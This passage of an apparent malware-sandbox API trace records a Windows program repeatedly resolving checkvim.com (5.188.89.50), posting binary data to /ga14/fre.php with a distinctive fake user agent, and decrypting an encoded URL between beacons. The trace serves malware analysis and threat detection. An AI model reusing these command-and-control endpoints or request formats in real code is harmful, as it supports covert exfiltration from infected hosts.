Size=0x4) returned 0x871c58 [0252.703] socket (af=2, type=1, protocol=6) returned 0x38c [0252.703] connect (s=0x38c, name=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0252.777] FreeAddrInfoW (pAddrInfo=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0252.777] GetProcessHeap () returned 0x840000 [0252.777] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f820 [0252.777] GetProcessHeap () returned 0x840000 [0252.777] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0252.778] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0252.779] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0252.779] GetProcessHeap () returned 0x840000 [0252.779] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0252.779] GetProcessHeap () returned 0x840000 [0252.779] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0252.779] GetProcessHeap () returned 0x840000 [0252.779] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f758 [0252.779] GetProcessHeap () returned 0x840000 [0252.779] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0252.780] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0252.781] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0252.781] GetProcessHeap () returned 0x840000 [0252.781] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0252.781] GetProcessHeap () returned 0x840000 [0252.781] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0252.781] send (s=0x38c, buf=0x873a58*, len=237, flags=0) returned 237 [0252.782] send (s=0x38c, buf=0x87eb58*, len=159, flags=0) returned 159 [0252.782] GetProcessHeap () returned 0x840000 [0252.782] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0252.782] recv (in: s=0x38c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0253.135] GetProcessHeap () returned 0x840000 [0253.136] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0253.136] GetProcessHeap () returned 0x840000 [0253.136] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0253.136] GetProcessHeap () returned 0x840000 [0253.136] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0253.136] GetProcessHeap () returned 0x840000 [0253.136] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f820 | out: hHeap=0x840000) returned 1 [0253.136] closesocket (s=0x38c) returned 0 [0253.137] GetProcessHeap () returned 0x840000 [0253.137] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c58 | out: hHeap=0x840000) returned 1 [0253.137] GetProcessHeap () returned 0x840000 [0253.137] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0253.137] GetProcessHeap () returned 0x840000 [0253.137] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0253.137] GetProcessHeap () returned 0x840000 [0253.137] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0253.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xcd8) returned 0x38c [0253.140] Sleep (dwMilliseconds=0xea60) [0253.141] GetProcessHeap () returned 0x840000 [0253.141] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0253.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.142] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0253.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.149] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0253.156] GetProcessHeap () returned 0x840000 [0253.156] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0253.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.157] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0253.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.158] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0253.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.159] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.159] GetProcessHeap () returned 0x840000 [0253.159] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0253.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.160] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0253.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.164] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0253.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.165] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0253.165] GetProcessHeap () returned 0x840000 [0253.165] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0253.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.166] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.167] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.198] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.200] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.200] GetProcessHeap () returned 0x840000 [0253.200] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0253.200] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0253.200] GetProcessHeap () returned 0x840000 [0253.200] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0253.200] GetProcessHeap () returned 0x840000 [0253.200] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0253.200] GetProcessHeap () returned 0x840000 [0253.200] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0253.200] GetProcessHeap () returned 0x840000 [0253.200] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0253.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.201] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0253.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.207] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0253.214] GetProcessHeap () returned 0x840000 [0253.214] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0253.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.215] CryptImportKey (in: hProv=0x86fb50, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0253.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.216] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0253.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.218] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.218] GetProcessHeap () returned 0x840000 [0253.218] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0253.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.219] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0253.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.220] CryptDestroyKey (hKey=0x87e270) returned 1 [0253.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.221] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0253.221] GetProcessHeap () returned 0x840000 [0253.221] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0253.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.222] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0253.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.223] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0253.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.224] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0253.224] GetProcessHeap () returned 0x840000 [0253.225] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0253.225] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0253.226] GetProcessHeap () returned 0x840000 [0253.226] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0253.226] socket (af=2, type=1, protocol=6) returned 0x390 [0253.227] connect (s=0x390, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0253.294] FreeAddrInfoW (pAddrInfo=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0253.294] GetProcessHeap () returned 0x840000 [0253.294] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0253.294] GetProcessHeap () returned 0x840000 [0253.294] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0253.295] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0253.296] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0253.296] GetProcessHeap () returned 0x840000 [0253.296] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0253.296] GetProcessHeap () returned 0x840000 [0253.296] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0253.296] GetProcessHeap () returned 0x840000 [0253.296] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0253.296] GetProcessHeap () returned 0x840000 [0253.296] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0253.297] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0253.298] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0253.298] GetProcessHeap () returned 0x840000 [0253.298] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0253.299] GetProcessHeap () returned 0x840000 [0253.299] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0253.299] send (s=0x390, buf=0x873a58*, len=237, flags=0) returned 237 [0253.299] send (s=0x390, buf=0x87eb58*, len=159, flags=0) returned 159 [0253.300] GetProcessHeap () returned 0x840000 [0253.300] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0253.300] recv (in: s=0x390, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0253.659] GetProcessHeap () returned 0x840000 [0253.659] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0253.659] GetProcessHeap () returned 0x840000 [0253.659] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0253.659] GetProcessHeap () returned 0x840000 [0253.659] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0253.659] GetProcessHeap () returned 0x840000 [0253.659] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0253.659] closesocket (s=0x390) returned 0 [0253.660] GetProcessHeap () returned 0x840000 [0253.660] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0253.660] GetProcessHeap () returned 0x840000 [0253.660] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0253.660] GetProcessHeap () returned 0x840000 [0253.660] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0253.660] GetProcessHeap () returned 0x840000 [0253.660] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0253.661] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1364) returned 0x390 [0253.663] Sleep (dwMilliseconds=0xea60) [0253.664] GetProcessHeap () returned 0x840000 [0253.665] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc68 [0253.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.666] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0253.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.682] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0253.690] GetProcessHeap () returned 0x840000 [0253.690] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0253.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.691] CryptImportKey (in: hProv=0x86f248, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0253.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.692] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0253.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.693] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.693] GetProcessHeap () returned 0x840000 [0253.693] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0253.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.694] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc68, pdwDataLen=0x19f9a4 | out: pbData=0x87fc68, pdwDataLen=0x19f9a4) returned 1 [0253.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.696] CryptDestroyKey (hKey=0x87e470) returned 1 [0253.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.697] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0253.697] GetProcessHeap () returned 0x840000 [0253.697] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0253.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.698] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.699] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.700] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.702] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.702] GetProcessHeap () returned 0x840000 [0253.702] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0253.702] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0253.702] GetProcessHeap () returned 0x840000 [0253.702] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0253.702] GetProcessHeap () returned 0x840000 [0253.702] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0253.702] GetProcessHeap () returned 0x840000 [0253.702] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0253.702] GetProcessHeap () returned 0x840000 [0253.702] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0253.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.707] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0253.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.712] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0253.719] GetProcessHeap () returned 0x840000 [0253.719] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0253.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.720] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0253.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.721] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0253.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.722] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.722] GetProcessHeap () returned 0x840000 [0253.722] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0253.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.724] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0253.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.725] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0253.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0253.727] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0253.728] GetProcessHeap () returned 0x840000 [0253.728] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0253.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.729] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0253.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.731] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0253.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.732] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0253.732] GetProcessHeap () returned 0x840000 [0253.732] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0253.732] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871268*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0253.734] GetProcessHeap () returned 0x840000 [0253.734] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0253.734] socket (af=2, type=1, protocol=6) returned 0x394 [0253.734] connect (s=0x394, name=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0253.804] FreeAddrInfoW (pAddrInfo=0x871268*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0253.804] GetProcessHeap () returned 0x840000 [0253.804] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0253.805] GetProcessHeap () returned 0x840000 [0253.805] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0253.805] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0253.806] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0253.806] GetProcessHeap () returned 0x840000 [0253.806] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0253.806] GetProcessHeap () returned 0x840000 [0253.806] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0253.807] GetProcessHeap () returned 0x840000 [0253.807] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fa70 [0253.807] GetProcessHeap () returned 0x840000 [0253.807] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, 